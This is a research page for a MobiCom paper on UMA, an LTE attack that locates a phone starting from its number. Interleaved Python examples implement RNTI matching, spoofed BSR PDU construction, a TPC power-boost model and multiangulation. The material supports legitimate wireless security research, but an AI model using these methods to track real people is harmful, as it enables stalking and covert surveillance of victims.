Enabling Physical Localization of Uncooperative Cellular Devices
Taekkyung Oh, Sangwook Bae, Junho Ahn, Yonghwa Lee, Tuan Dinh Hoang, Min Suk Kang, Nils Ole Tippenhauer, Yongdae Kim
To trace the physical location of cellular devices in practical environments, an unprivileged attacker utilizing Angle-of-Arrival (AoA) measurement would face several challenges:
C1) The attacker can launch the attack only when the victim generates uplink traffic.
C2) The victim may transmit a very weak signal when it is close to the cell tower.
C3) Network entities such as repeaters may confuse the direction-finding of the signal.
To overcome these practical challenges, we present UMA (Uncooperative Multiangulation Attack). UMA lets an unprivileged attacker determine the victim's physical location starting from an online identity, by integrating the following solutions:
S1) The attacker forces the victim to transmit traffic continuously and fixes the victim's RNTI.
S2) The attacker boosts the victim’s signal strength to the maximum.
S3) The attacker uniquely distinguishes traffic from the victim and the repeaters.
To obtain the RNTI associated with a representative online identity, the phone number, we adopt a traffic pattern consisting of three or more call/SMS trials separated by 6-second gaps. Given this traffic pattern and the target's online identity, we run the RNTI acquisition process in a crowded commercial network in which a total of 862 active users were detected over an hour. We use COTS devices: an iPhone 14 Pro as the sender and a Galaxy S10 5G as the receiver. Over ten runs, we achieve a 100% success rate in distinguishing the target's RNTIs from the others.
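The matching step above, as an added example that is not the paper's code: the attacker places the call/SMS trials at known times, the sniffer logs every uplink grant it decodes as a (time, RNTI) pair, and the RNTI that reacts after every trial is kept. The reaction window (1.5 s), the assumption that the victim stays connected across the 6 s gaps so its RNTI does not change, and the event log itself are constructed for this illustration.

```python
"""Added example (not the paper's code): pick the RNTI that reacts to every
call/SMS trial placed to the target's phone number.

Assumptions: the sniffer yields (time_s, rnti) pairs for every uplink grant it
decodes from the downlink control channel; the attacker logged when it placed
each trial; the victim stays RRC-connected across the 6 s gaps, so its RNTI
does not change.  The event log below is constructed, not captured data."""

from collections import defaultdict

TRIAL_GAP_S = 6.0      # gap between trials used on the page
N_TRIALS = 3           # the page uses three or more trials
REACT_WINDOW_S = 1.5   # assumed: the victim's uplink reaction lands within 1.5 s of a trial


def trial_times(t0, n=N_TRIALS, gap=TRIAL_GAP_S):
    """Absolute times at which the attacker places the call/SMS trials."""
    return [t0 + i * gap for i in range(n)]


def rntis_active_in(events, start, end):
    """RNTIs with at least one uplink grant in [start, end)."""
    return {rnti for t, rnti in events if start <= t < end}


def candidate_rntis(events, trials, window=REACT_WINDOW_S):
    """RNTIs that show uplink activity shortly after *every* trial."""
    candidates = None
    for t in trials:
        active = rntis_active_in(events, t, t + window)
        candidates = active if candidates is None else candidates & active
    return candidates or set()


def rank_by_quietness(events, trials, candidates, window=REACT_WINDOW_S):
    """Tie-break among candidates: count each one's grants *outside* the
    reaction windows.  A user who is busy all the time (bulk upload) survives
    the intersection by accident but scores high; the victim, idle between
    trials, scores zero and sorts first."""
    noise = defaultdict(int)
    for t, rnti in events:
        if rnti in candidates and not any(s <= t < s + window for s in trials):
            noise[rnti] += 1
    return sorted(candidates, key=lambda r: (noise[r], r))


def acquire_rnti(events, trials, window=REACT_WINDOW_S):
    """Ranked list of RNTIs, most likely victim first (empty if none match)."""
    return rank_by_quietness(events, trials, candidate_rntis(events, trials, window), window)


def constructed_events():
    """Constructed sniffer log: one busy user, one bursty user, two idle users."""
    ev = [(t, 0x4A3) for t in (10.3, 16.4, 22.2)]          # victim: reacts to each trial
    ev += [(i * 0.5, 0x1F0) for i in range(60)]             # bulk uploader, grant every 0.5 s
    ev += [(5.1, 0x0B7), (5.2, 0x0B7), (16.2, 0x0B7)]       # web user, bursty
    ev += [(10.5, 0x2C9)]                                   # idle user active after trial 1 only
    return sorted(ev)


if __name__ == "__main__":
    trials = trial_times(10.0)
    print("trials at", trials)
    print("candidates:", [hex(r) for r in candidate_rntis(constructed_events(), trials)])
    print("ranked:", [hex(r) for r in acquire_rnti(constructed_events(), trials)])
```

The intersection alone leaves the bulk uploader in the candidate set, which is why the page's design uses several trials and why a quietness tie-break is worth having in a cell with hundreds of active users.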
The scheduling manipulation attack aims to fix the target's RNTI and force it to send uplink traffic it did not intend to send. It exploits weaknesses in the PHY and MAC layer protocols, specifically the Scheduling Request and Buffer Status Report (BSR) mechanisms. By spoofing the victim's uplink transmissions under the victim's RNTI and injecting fake messages into the eNB, the attacker prompts the eNB to allocate uplink grants to the victim even when it has no actual data to transmit.
We evaluate the scheduling manipulation attack against 9 COTS devices. As a result, we confirm that the target UE's RNTI remains unchanged and its unintended uplink transmission is successfully triggered during the attack.
The power boosting attack aims to raise the target UE's uplink transmission power so that it reaches out of the attacker's shadow area, by exploiting the Transmit Power Control (TPC) command, which the UE obeys without verifying its origin. A shadow area is a location where the unprivileged attacker cannot detect the victim's uplink signal because of its low transmission power. For example, when the UE is close to the eNB, the path loss is lower, so the UE lowers its transmission power. The key idea is to inject manipulated subframes into the victim UE that carry TPC commands instructing it to increase its transmission power.
We evaluate the power boosting attack against Galaxy Note FE, Galaxy Note 10 5G, Galaxy S10 5G, Galaxy S20, Galaxy Z Flip 4, and LG G8. As a result, we confirm that the power boosting attack successfully increases the target UE's transmission power to the maximum level (22-23 dBm).
The attacker can also use the power boosting attack to overcome the challenge caused by cellular repeaters. A repeater re-transmits the victim's uplink, so the attacker may mistakenly estimate the repeater's location as the victim's location.
By comparing how the signal strengths of the UE and of the repeater change after the power boosting attack, the attacker can tell the victim's signal apart and accurately determine the victim's location. This works because a repeater constantly amplifies its input signal to its maximum capacity, so the uplink power observed at the repeater side stays unchanged even after the power boosting attack, whereas the victim's own uplink signal becomes stronger.
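A toy model of the two effects described above (shadow area shrinking under boosted power, and the before/after comparison that separates a UE from a repeater), added here as an example and not taken from the paper. The TPC accumulation follows TS 36.213 and P_CMAX is the 23 dBm of a power class 3 UE; the path-loss model, P0, detection threshold, sniffer distances and repeater gain/cap are assumptions chosen only to make the numbers readable.

```python
"""Added example (not the paper's code): a toy model of the power boosting
attack.  It applies injected TPC commands to the UE's accumulated power term,
shows how the attacker's shadow area shrinks, and runs the before/after check
that separates a real UE from a repeater.  The path-loss model, P0, detection
threshold and repeater parameters are assumptions, not the page's values."""

import math

P_CMAX_DBM = 23.0                         # UE power class 3 maximum (TS 36.101)
TPC_DELTA_DB = {0: -1, 1: 0, 2: 1, 3: 3}  # accumulated delta per TPC field (TS 36.213 Table 5.1.1.1-2)
DETECT_THRESHOLD_DBM = -100.0             # assumed: the "red box" noise-floor threshold


def path_loss_db(d_m, exponent=3.0, pl_1m_db=40.0):
    """Assumed log-distance model: 40 dB at 1 m, exponent 3."""
    return pl_1m_db + 10.0 * exponent * math.log10(max(d_m, 1.0))


def ue_tx_power_dbm(d_ue_enb_m, f_accum_db=0.0, p0_dbm=-75.0, alpha=1.0):
    """TS 36.213 5.1.1.1 for one RB, without the Delta_TF term:
    P = min(P_CMAX, P0 + alpha*PL + f(i)); f(i) is the accumulated TPC term.
    p0_dbm is an assumption."""
    return min(P_CMAX_DBM, p0_dbm + alpha * path_loss_db(d_ue_enb_m) + f_accum_db)


def apply_tpc(d_ue_enb_m, f_accum_db, tpc_fields):
    """Feed injected TPC fields into f(i).  Positive commands stop accumulating
    once the UE is already at P_CMAX, as the spec requires."""
    for field in tpc_fields:
        delta = TPC_DELTA_DB[field]
        if delta > 0 and ue_tx_power_dbm(d_ue_enb_m, f_accum_db) >= P_CMAX_DBM:
            continue
        f_accum_db += delta
    return f_accum_db


def rx_power_dbm(tx_dbm, d_sniffer_ue_m, antenna_gain_db=0.0):
    """Power arriving at the sniffer (antenna gain assumed 0 dB here)."""
    return tx_dbm + antenna_gain_db - path_loss_db(d_sniffer_ue_m)


def detection_range_m(tx_dbm, threshold_dbm=DETECT_THRESHOLD_DBM):
    """Largest integer sniffer-UE distance still above the detection threshold;
    beyond it the sniffer sits in the shadow area."""
    d = 1
    while rx_power_dbm(tx_dbm, d + 1) >= threshold_dbm:
        d += 1
    return d


def repeater_out_dbm(input_dbm, gain_db=100.0, p_max_dbm=20.0):
    """Assumed repeater: fixed gain with a hard output cap.  The page reports
    that repeaters already run at their maximum, so the output is modelled as
    saturated and does not follow the UE's power."""
    return min(p_max_dbm, input_dbm + gain_db)


def classify_sources(before_dbm, after_dbm, min_gain_db=3.0):
    """Per-bearing check from the page: the direction whose received power rises
    after boosting is the UE; a direction that stays flat is a repeater."""
    return {k: ("ue" if after_dbm[k] - before_dbm[k] >= min_gain_db else "repeater")
            for k in before_dbm}


def demo(d_ue_enb_m=10.0, d_rep_ue_m=10.0, d_sniffer_ue_m=50.0):
    """UE 10 m from the eNB (weak uplink), a repeater 10 m from the UE, and a
    sniffer 50 m from the UE; all distances are constructed."""
    f0, f1 = 0.0, apply_tpc(d_ue_enb_m, 0.0, [3] * 12)   # twelve injected +3 dB commands
    tx0, tx1 = ue_tx_power_dbm(d_ue_enb_m, f0), ue_tx_power_dbm(d_ue_enb_m, f1)
    before = {"ue": rx_power_dbm(tx0, d_sniffer_ue_m),
              "repeater": repeater_out_dbm(rx_power_dbm(tx0, d_rep_ue_m))}
    after = {"ue": rx_power_dbm(tx1, d_sniffer_ue_m),
             "repeater": repeater_out_dbm(rx_power_dbm(tx1, d_rep_ue_m))}
    return {"tx_before_dbm": tx0, "tx_after_dbm": tx1,
            "range_before_m": detection_range_m(tx0), "range_after_m": detection_range_m(tx1),
            "classified": classify_sources(before, after)}


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

With these assumed numbers the UE near the eNB transmits at -5 dBm and is lost beyond roughly 70 m, in line with the blue curve the page reports; after the injected TPC commands it sits at P_CMAX and the repeater, already saturated, is the only direction whose level does not move.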
A total of six steps were conducted sequentially for end-to-end evaluation.
We demonstrate the combined scheduling manipulation and power boosting attack against 3 COTS devices in a commercial LTE testbed (an industry-grade LTE solution from Nokia in a 5 m x 7 m shielded room, established by a national institute). This demonstration shows the feasibility of the attack in a real-world environment.
DEMO #1
Scheduling manipulation attack + Power boosting attack against Samsung Galaxy S10 5G (Samsung Exynos baseband).
DEMO #2
Scheduling manipulation attack + Power boosting attack against Samsung Galaxy S20 (Qualcomm Snapdragon baseband).
DEMO #3
Scheduling manipulation attack + Power boosting attack against Samsung Galaxy Z Flip 4 (Qualcomm Snapdragon baseband).
Here's some exciting news!! Using a vehicle-mounted version of UMA, we caught smartphones used for vishing crime. The video below shows the moment we found the criminal's phone with the Korean Police.
Wireshark captures of uplink traffic at the srsENB provide empirical evidence of the attack's effectiveness.
This figure shows captured uplink packets during scheduling manipulation at the srsENB. Note that PHY layer messages (i.e., scheduling request and DCI 0) are not visible in Wireshark captures. This demonstrates the results of executing steps 3 and 4 in scheduling manipulation four times consecutively. Packets #674, 676, 679, and 682 correspond to the attacker's transmissions, while the remaining messages represent the victim UE’s transmissions.
This is the MAC layer packet (#674) sent by the attacker. The Service Data Unit (SDU) field contains arbitrary data chosen by the attacker. This transmission is consistent with the attacker's fake scheduling request, which indicated that the victim's RNTI has buffered data. The fake BSR reports that the victim UE has additional data (171-200 bytes) waiting in its buffer, prompting the eNB to allocate uplink resources to the victim's RNTI.
This is the MAC layer packet (#675) sent by the victim in response to the multiple uplink grants allocated through DCI 0 messages. BS=0 means the victim has no more data in its buffer; the padding is the filler the victim transmits to occupy the remaining granted space.
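The two PDUs above, rebuilt and decoded byte by byte as an added example (not the paper's or srsRAN's code). The layouts are those of 3GPP TS 36.321: R/R/E/LCID subheaders, a one-byte Short BSR (LCG ID + 6-bit buffer size index) and padding with LCID 31; buffer size index 20 is the (171, 200] row that Wireshark displays. The SDU bytes, the logical channel ID and the grant size are constructed.

```python
"""Added example (not the paper's or srsRAN's code): build and decode the two
LTE MAC PDUs described above, following the subheader and Short BSR layouts
of 3GPP TS 36.321 (sections 6.1.2 and 6.1.3.1).  Only the Short BSR, padding
and data-SDU elements are handled; other control elements are out of scope.
The SDU payload, logical channel and grant size below are constructed."""

LCID_SHORT_BSR = 0x1D   # 11101
LCID_PADDING = 0x1F     # 11111

# TS 36.321 Table 6.1.3.1-1: upper bound (bytes) of the buffer size reported by
# each index; only rows 0..21 are embedded here.
BSR_UPPER = [0, 10, 12, 14, 17, 19, 22, 26, 31, 36, 42, 49, 57, 67, 78, 91,
             107, 125, 146, 171, 200, 234]


def bsr_index(nbytes):
    """Smallest index whose bound covers nbytes (index 0 = empty buffer)."""
    for idx, upper in enumerate(BSR_UPPER):
        if nbytes <= upper:
            return idx
    raise ValueError("extend BSR_UPPER for buffers above 234 bytes")


def bsr_range(idx):
    """Byte range (lower, upper] that an index stands for, as Wireshark shows it."""
    return (0, 0) if idx == 0 else (BSR_UPPER[idx - 1], BSR_UPPER[idx])


def subheader(lcid, more, length=None):
    """R/R/E/LCID byte; a variable-size SDU that is not last also carries F/L."""
    out = bytes([(0x20 if more else 0x00) | (lcid & 0x1F)])
    if length is not None:
        out += bytes([length]) if length < 128 else bytes([0x80 | (length >> 8), length & 0xFF])
    return out


def short_bsr(lcg, nbytes):
    """Short BSR control element: LCG ID (2 bits) | buffer size index (6 bits)."""
    return bytes([((lcg & 0x3) << 6) | bsr_index(nbytes)])


def attacker_pdu(claimed_bytes=180, lcg=0, lcid=3, sdu=b"\x00" * 8):
    """The fake PDU sent under the victim's RNTI: a Short BSR claiming data is
    buffered, plus an arbitrary SDU on a data logical channel (packet #674)."""
    header = subheader(LCID_SHORT_BSR, more=True) + subheader(lcid, more=False)
    return header + short_bsr(lcg, claimed_bytes) + sdu


def victim_pdu(grant_bytes, lcg=0):
    """What the idle victim sends when the eNB grants it resources anyway:
    BS=0 and padding filling the rest of the grant (packet #675)."""
    header = subheader(LCID_SHORT_BSR, more=True) + subheader(LCID_PADDING, more=False)
    body = short_bsr(lcg, 0)
    return header + body + b"\x00" * (grant_bytes - len(header) - len(body))


def parse_pdu(pdu):
    """Walk the subheaders, then the bodies; return [(lcid, fields), ...]."""
    i, headers = 0, []
    while True:
        b = pdu[i]
        i += 1
        more, lcid = bool(b & 0x20), b & 0x1F
        if lcid in (LCID_SHORT_BSR, LCID_PADDING) or not more:
            length = None                       # fixed-size CE, padding, or last element
        elif pdu[i] & 0x80:                     # F=1: 15-bit length
            length = ((pdu[i] & 0x7F) << 8) | pdu[i + 1]
            i += 2
        else:                                   # F=0: 7-bit length
            length = pdu[i] & 0x7F
            i += 1
        headers.append((lcid, length))
        if not more:
            break
    parsed = []
    for lcid, length in headers:
        if lcid == LCID_SHORT_BSR:
            parsed.append((lcid, {"lcg": pdu[i] >> 6, "bs": bsr_range(pdu[i] & 0x3F)}))
            i += 1
        elif lcid == LCID_PADDING:
            parsed.append((lcid, {"padding": len(pdu) - i}))
            i = len(pdu)
        else:
            end = len(pdu) if length is None else i + length
            parsed.append((lcid, {"sdu": pdu[i:end]}))
            i = end
    return parsed


if __name__ == "__main__":
    print("attacker:", attacker_pdu().hex(), parse_pdu(attacker_pdu()))
    print("victim:  ", victim_pdu(40).hex(), parse_pdu(victim_pdu(40)))
```

Nothing in the PDU ties it to the sender: the eNB learns the claimed buffer state only from the RNTI the transmission was scheduled under and from these unauthenticated MAC bytes, which is the gap the scheduling manipulation attack relies on.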
To get hands-on experience with the localization attack with multiangulation, we first build the sniffer. Then, to examine the performance of the attack in the wild, we conduct localization in the commercial cellular network.
Note that we do not use specialized hardware such as LTEye. Instead, we use a parabolic antenna to eavesdrop on RF signals of downlink and uplink channels. The resulting LTE channel sniffer runs on an Intel Core i5 desktop with SDR. The left channel of the USRP is used for the downlink channel eavesdropping, and the right channel is for the uplink channel eavesdropping. A directional antenna is mounted on the uplink channel of the USRP, and both channels share the same clock.
Using the LTE channel sniffer, we conduct localization with three sniffers and use a COTS device (Galaxy S10) as the target. The sniffers and the UE are deployed in the same cellular coverage. The experiment is performed in a Line-of-Sight (LoS) environment of 100 m x 100 m, and we deploy three sniffers, denoted by the purple squares in the left figure. The UE is placed at nine positions at 30 m intervals, shown as red circles.
First, we estimate the direction of the strongest uplink signal detected at each sniffer while rotating the directional antenna (i.e., AoA measurement). Then, we perform multiangulation on the AoA measurements of each sniffer to predict the location of the UE. The predicted UE locations at each point are denoted by the three yellow crosses in the left figure. Since we already know the locations of the sniffers, we can estimate the location of the target UE in coordinate units.
We evaluate the performance of the AoA measurements with a cumulative distribution function (CDF) of the angular error. The maximum angular error is about 8 degrees and the minimum about 4 degrees, as shown in the middle figure. This may include human error in rotating the antenna and judging the direction of the strongest uplink signal. Then, we evaluate the performance of the location predictions with a CDF of the distance error. As shown in the right figure, the maximum distance error is about 14 m and the minimum about 10 m. When two sniffers are used to estimate the location of a UE, the localization performance is better than when the measurements of all three sniffers are combined.
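The multiangulation step above, written out as an added example (not the paper's code): each sniffer contributes a bearing line through its known position, the fix is the point minimising the summed squared distance to those lines, and the angular and distance errors are computed the way the page reports them. The sniffer layout, the UE position and the fixed per-sniffer bearing bias are constructed; whether a pair of sniffers beats all three depends on the geometry and on how the biases happen to line up, so the example reports every pair rather than asserting either way.

```python
"""Added example (not the paper's code): least-squares multiangulation from
AoA bearings measured at known sniffer positions, with the angular-error and
distance-error metrics used on the page.  Sniffer layout, UE position and the
bearing bias are constructed to mimic the 100 m x 100 m LoS experiment."""

import math
from itertools import combinations


def bearing_deg(src, dst):
    """Angle of the src->dst vector in degrees, 0..360, x-axis = 0."""
    return math.degrees(math.atan2(dst[1] - src[1], dst[0] - src[0])) % 360.0


def angular_error_deg(measured, truth):
    """Smallest difference between two bearings on the circle."""
    return abs((measured - truth + 180.0) % 360.0 - 180.0)


def multiangulate(sniffers, bearings):
    """Point minimising the sum of squared perpendicular distances to the
    bearing lines (2x2 normal equations solved by hand, so no numpy is
    needed).  Works for two or more sniffers."""
    a11 = a12 = a22 = b1 = b2 = 0.0
    for (sx, sy), th in zip(sniffers, bearings):
        t = math.radians(th)
        nx, ny = -math.sin(t), math.cos(t)      # unit normal of the bearing line
        c = nx * sx + ny * sy                    # line equation: n . p = c
        a11 += nx * nx
        a12 += nx * ny
        a22 += ny * ny
        b1 += nx * c
        b2 += ny * c
    det = a11 * a22 - a12 * a12
    if abs(det) < 1e-9:
        raise ValueError("bearings are (nearly) parallel; no unique fix")
    return ((a22 * b1 - a12 * b2) / det, (a11 * b2 - a12 * b1) / det)


def distance_error_m(estimate, truth):
    return math.hypot(estimate[0] - truth[0], estimate[1] - truth[1])


def evaluate(sniffers, ue, bearing_bias_deg):
    """Simulate one localisation: each sniffer's AoA is off by a fixed bias
    (standing in for the 4-8 degree error the page measured); return the
    angular errors, the fix error using all sniffers, and the fix error of
    every pair of sniffers (keyed by the pair's indices)."""
    measured = [bearing_deg(s, ue) + b for s, b in zip(sniffers, bearing_bias_deg)]
    results = {
        "angular_err": [angular_error_deg(m, bearing_deg(s, ue)) for s, m in zip(sniffers, measured)],
        "all": distance_error_m(multiangulate(sniffers, measured), ue),
    }
    for pair in combinations(range(len(sniffers)), 2):
        est = multiangulate([sniffers[i] for i in pair], [measured[i] for i in pair])
        results[pair] = distance_error_m(est, ue)
    return results


SNIFFERS = [(0.0, 0.0), (100.0, 0.0), (80.0, 100.0)]   # constructed layout (metres)
UE = (30.0, 60.0)                                       # constructed ground truth

if __name__ == "__main__":
    for k, v in evaluate(SNIFFERS, UE, [5.0, -5.0, 5.0]).items():
        print(k, v)
```

Two practical points the code makes explicit: a sniffer collinear with the UE and another sniffer adds a parallel line and no information (the function refuses a singular system), and the error from a pair grows as the crossing angle of its two bearings shrinks, which is why sniffer placement matters as much as antenna accuracy.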
We measure the arriving signal strength at the sniffer, which runs on a 10 MHz LTE channel in the 800 MHz band. We use a COTS device, a Samsung Galaxy S10, as the victim's UE. Both the UE and the sniffer are connected to the commercial network and located within the same commercial cell coverage in an urban environment. In this experiment, we point the parabolic antenna mounted on the sniffer at the UE. To compute the signal strength, we average the strength monitored at the sniffer over 2,000 subframes in each measurement trial.
First, we consider the case in which the UE is located far from the eNB. We place the UE 90m away from the eNB. We then place the sniffer in the middle of the eNB and the UE. The sniffer measures the arrival signal strength every 10m between the eNB and the UE. Second, we consider the case when the UE is located close to the eNB, in contrast to the first case. For this, we place the UE 10m away from the eNB. The sniffer is situated 20m from the eNB, which is 10m from the UE. Then, we measure the signal strength at the sniffer by placing it every 10m up to 80m from the UE.
In the figure, orange-colored and blue-colored lines show the measured signal strength at the sniffer. The red box in the figure represents the detection threshold, and it was determined by measuring signal strength when uplink signals do not exist. When the UE is far from the eNB (orange line), the attacker's sniffer is able to detect the victim's uplink signals well, more than 80m away from the UE. However, when the UE is close to the eNB (blue line), the sniffer can no longer detect the victim's uplink signals in the case the sniffer is situated more than 70m away from the UE. This is because the UE transmits its uplink data with lower signal power when the UE is located close to eNB.
We investigate the impact of the UE's behavior on the attacker's sniffer, using the three behaviors employed in the previous experiment (i.e., voice call, web surfing, and bulk uploading). In this experiment, we place the sniffer 45 m away from an eNB. We then measure the arriving signal strength while moving the UE from 10 m to 150 m away from the sniffer in 10 m steps.
The figure shows the signal strength measured at the attacker's sniffer for the three types of UE behavior. The attacker's sniffer easily detects the uplink signals when the UE is doing bulk uploads or making voice calls. On the other hand, the signal strength measured during web surfing is lower than for the other two, so the attacker fails to detect the signal once the UE is more than 60 m away from the sniffer.
Here we present a simple strategy for conducting UMA in a real-world environment, taking these practical issues into account. One of the sniffers used for multiangulation should be placed near an eNB, as a reference point, because a victim located near the eNB transmits its uplink data with low signal power.
After the AoA measurement at the reference point, the attacker can place one or two further sniffers at other points chosen from the direction estimated at the reference point. In general, an LTE cell consists of three sector sites, each covering a 120º range (i.e., 3 × 120º), so the attacker can place the sniffers within one sector, as shown in the figure. For three-dimensional localization, we recommend three sniffers for multiangulation. Otherwise, two sniffers are enough, since we have empirically confirmed that two sniffers give better two-dimensional localization. Finally, when a shadow area occurs during the localization attack, the attacker can force the victim's UE to increase its transmission power with the power boosting attack.
Oh et al., "Enabling Physical Localization of Uncooperative Cellular Devices," International Conference on Mobile Computing and Networking (ACM MobiCom), 2024.
Official MobiCom paper link: https://doi.org/10.1145/3636534.3690709
Pre-print version of paper: https://arxiv.org/pdf/2403.14963